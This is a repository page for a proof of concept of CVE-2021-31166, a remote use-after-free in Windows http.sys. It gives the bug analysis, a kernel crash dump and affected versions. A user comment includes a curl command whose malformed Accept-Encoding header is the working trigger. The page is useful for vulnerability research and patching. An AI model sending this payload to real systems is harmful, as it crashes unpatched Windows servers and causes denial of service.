Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

Overview

CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability

This is a proof of concept for CVE-2021-31166 ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free dereference in http.sys patched by Microsoft in May 2021. According to this tweet the vulnerability has been found by @_mxms and @fzzyhd1.

trigger

The bug itself happens in http!UlpParseContentCoding where the function has a local LIST_ENTRY and appends item to it. When it's done, it moves it into the Request structure; but it doesn't NULL out the local list. The issue with that is that an attacker can trigger a code-path that frees every entries of the local list leaving them dangling in the Request object.

rel04vsrel05

Here is the bugcheck:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000003,0xFFFFF90EA867EE40,0xFFFFF90EA867ED98,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`19410c50 cc              int     3

kd> kp
 # Child-SP          RetAddr               Call Site
00 fffff90e`a867e368 fffff804`19525382     nt!DbgBreakPointWithStatus
01 fffff90e`a867e370 fffff804`19524966     nt!KiBugCheckDebugBreak+0x12
02 fffff90e`a867e3d0 fffff804`19408eb7     nt!KeBugCheck2+0x946
03 fffff90e`a867eae0 fffff804`1941ad69     nt!KeBugCheckEx+0x107
04 fffff90e`a867eb20 fffff804`1941b190     nt!KiBugCheckDispatch+0x69
05 fffff90e`a867ec60 fffff804`19419523     nt!KiFastFailDispatch+0xd0
06 fffff90e`a867ee40 fffff804`1db3f677     nt!KiRaiseSecurityCheckFailure+0x323
07 fffff90e`a867efd0 fffff804`1daf6c05     HTTP!UlFreeUnknownCodingList+0x63
08 fffff90e`a867f000 fffff804`1dacd201     HTTP!UlpParseAcceptEncoding+0x299c5
09 fffff90e`a867f0f0 fffff804`1daa93d8     HTTP!UlAcceptEncodingHeaderHandler+0x51
0a fffff90e`a867f140 fffff804`1daa8ab7     HTTP!UlParseHeader+0x218
0b fffff90e`a867f240 fffff804`1da04c5f     HTTP!UlParseHttp+0xac7
0c fffff90e`a867f3a0 fffff804`1da0490a     HTTP!UlpParseNextRequest+0x1ff
0d fffff90e`a867f4a0 fffff804`1daa48c2     HTTP!UlpHandleRequest+0x1aa
0e fffff90e`a867f540 fffff804`1932ae85     HTTP!UlpThreadPoolWorker+0x112
0f fffff90e`a867f5d0 fffff804`19410408     nt!PspSystemThreadStartup+0x55
10 fffff90e`a867f620 00000000`00000000     nt!KiStartSystemThread+0x28

kd> !analyze -v
[...]
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure.  The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: fffff90ea867ee40, Address of the trap frame for the exception that caused the BugCheck
Arg3: fffff90ea867ed98, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved

Frequently Asked Questions

Q: Is Windows Remote Management (WinRM) affected?

Yes (thanks to @JimDinMN for sharing his experiments).

Q: Is Web Services on Devices (WSDAPI) affected?

Yes (thanks to @HenkPoley for sharing his results).

Q: What are the affected versions of Windows?

According to Microsoft's documentation, here are the affected platforms:

  • Windows Server, version 2004 (or 20H1) (Server Core installation),
  • Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems,
  • Windows Server, version 20H2 (Server Core Installation),
  • Windows 10 Version 20H2 for ARM64/x64/32-bit Systems.
Comments
  • SyntaxError: invalid syntax

    SyntaxError: invalid syntax

    D:\git\Vulnerability\CVE\CVE-2021-31166>C:\python27\python.exe cve-2021-31166.py --target=172.23.240.1 File "cve-2021-31166.py", line 9 r = requests.get(f'http://{args.target}/', headers = { ^ SyntaxError: invalid syntax

    D:\git\Vulnerability\CVE\CVE-2021-31166>

    opened by kouzhudong 5
  • Connection timed out

    Connection timed out

    On Linux the command python3 cve-2021-31166.py --target=192.168.0.112 hangs then fails with connection timed out error. Target is a Windows 10 20H2 64 bit machine that (I believe) wasn't updated in 3 weeks. Does that mean it isn't vulnerable?

    opened by trivia211 4
  • Update cve-2021-31166.py

    Update cve-2021-31166.py

    Hello dear friend, I have to admit that the idea for this exploit is simply brilliant. Dear friend, I've made a little update, for this good decision... If you want it of course... KR @nu11secur1ty S.A.I.E

    opened by nu11secur1ty 3
  • Could you possibly mentioned version number?

    Could you possibly mentioned version number?

    I am using Windows 10 Version IIS version 20H2 for x64 Systems. and when I am trying PoC and perdform manually using burpsuit. It is showing 400 response. Could you help me out?

    Version details image

    PoC image

    opened by PunitTailor55 3
  • <Responce [200]>

    Hello! OS Windows-Server-2016-Standard, try: python3 cve-2021-31166.py --target X.X.X.X But <Responce [200]>. This is because OS not from trouble list: Windows Server version 2004 (or 20H1) , Windows 10 Version 2004 (or 20H1), Windows Server, version 20H2, Windows 10 Version 20H2?

    opened by Nik100 1
  • Question - Comment

    Question - Comment

    I think you can use curl to exploit as well. Likely local privilege escalation, since a normal user can register a listener on a high port.

    $listener = New-Object System.Net.HttpListener
    $listener.Prefixes.Add('http://localhost:8080/') 
    $listener.Start()
    curl.exe -H 'Accept-Encoding:  doar-e, ftw, imo, ,' http://localhost:8080/
    

    Also which tool are you using to reverse with, for the images? Very cool

    Cheers

    opened by ghost 1
Releases(v1)
Owner
Axel Souchet
Axel Souchet
Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)

CVE-2021-42694 Generate malicious files using recently published homoglyph-attack vulnerability, which was discovered at least in C, C++, C#, Go, Pyth

js-on 17 Dec 11, 2022
Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228

log4j-honeypot-flask Internal network honeypot for detecting if an attacker or insider threat scans your network for log4j CVE-2021-44228 This can be

Binary Defense 144 Nov 19, 2022
Proof of concept GnuCash Webinterface

Proof of Concept GnuCash Webinterface This may one day be a something truly great. Milestones [ ] Browse accounts and view transactions [ ] Record sim

Josh 14 Dec 28, 2022
EyeJo是一款自动化资产风险评估平台,可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查,快速发现存在的薄弱点和攻击面。

EyeJo EyeJo是一款自动化资产风险评估平台,可以协助甲方安全人员或乙方安全人员对授权的资产中进行排查,快速发现存在的薄弱点和攻击面。 免责声明 本平台集成了大量的互联网公开工具,主要是方便安全人员整理、排查资产、安全测试等,切勿用于非法用途。使用者存在危害网络安全等任何非法行为,后果自负,作

429 Dec 31, 2022
Confluence OGNL injection

CVE-2021-26084 Confluence OGNL injection CVE-2021-26084 is an Object-Graph Navigation Language (OGNL) injection vulnerability in the Atlassian Conflue

Ashish Kunwar 15 Sep 23, 2022
IDA scripts for hypervisor (Hyper-v) analysis and reverse engineering automation

Re-Scripts IA32-VMX-Helper (IDA-Script) IA32-MSR-Decoder (IDA-Script) IA32 VMX Helper It's an IDA script (Updated IA32 MSR Decoder) which helps you to

Behrooz Abbassi 16 Oct 08, 2022
Internationalized Domain Names for Python (IDNA 2008 and UTS #46)

Internationalized Domain Names in Applications (IDNA) Support for the Internationalised Domain Names in Applications (IDNA) protocol as specified in R

Kim Davies 204 Dec 13, 2022
Obfuscate your Python scripts better, faster.

⚜️ Berserker ⚜️ An unique Python3 obfuscator using Kyrie Eleison's encryption protocol, written in Python3. 📋 Examples 📋 Unobfuscated: input("Hello

Billy 81 Dec 07, 2022
Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

Jet Berry's 21 Jan 01, 2023
Bilgi Sistemleri Projesi için yapılan keylogger

Keylogger Bilgi Sistemleri Projesi için yapılan keylogger Projede kullanılan kütüphanelere sahip olmasanız da python dosyası çalıştığında kendisi gere

Tarik Bulut 1 Jan 07, 2022
MainCoon - an automated recon framework

MainCoon is an automated recon framework meant for gathering information during penetration testing of web applications.

Md. Nur habib 8 Aug 26, 2022
Find exposed API keys based on RegEx and get exploitation methods for some of keys that are found

dora Features Blazing fast as we are using ripgrep in backend Exploit/PoC steps for many of the API key, allowing to write a good report for bug bount

Siddharth Dushantha 243 Dec 27, 2022
BurpSuite Extension: Log4j2 RCE Scanner

Log4j2 RCE Scanner 作者:[email protected]元亨实验室 声明:由于传播、利用本项目所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,项目作者不为此承担任何责

ᴋᴇʏ 87 Dec 29, 2021
Whois-Python - Get Whois Domain with Python GUI

Whois-Python-GUI Get Whois Domain with Python - GUI :) WARNING Dont Copy ! - W

MR.D3F417 3 Feb 21, 2022
Operational information regarding the vulnerability in the Log4j logging library.

Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-442

Nationaal Cyber Security Centrum (NCSC-NL) 1.9k Dec 26, 2022
Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Matt Creel 27 Dec 20, 2022
A Tool for subdomain scan with other tools

ReconTracer A Tool for subdomain scan with other tools ReconTracer Find subdomains by using another amazing sources!. Obs: In a close future recontrac

15 Dec 18, 2021
Fuzzercorn - Bring libfuzzer to Unicorn

Fuzzercorn libfuzzer bindings for Unicorn. API // The main entry point of the fu

lazymio 23 Nov 17, 2022
Android Malware Behavior Deleter

Android Malware Behavior Deleter UDcide UDcide is a tool that provides alternative way to deal with Android malware. We help you to detect and remove

27 Sep 23, 2022
宝塔面板Windows版提权方法

宝塔面板Windows提权方法 本项目整理一些宝塔特性,可以在无漏洞的情况下利用这些特性来增加提权的机会。

298 Dec 14, 2022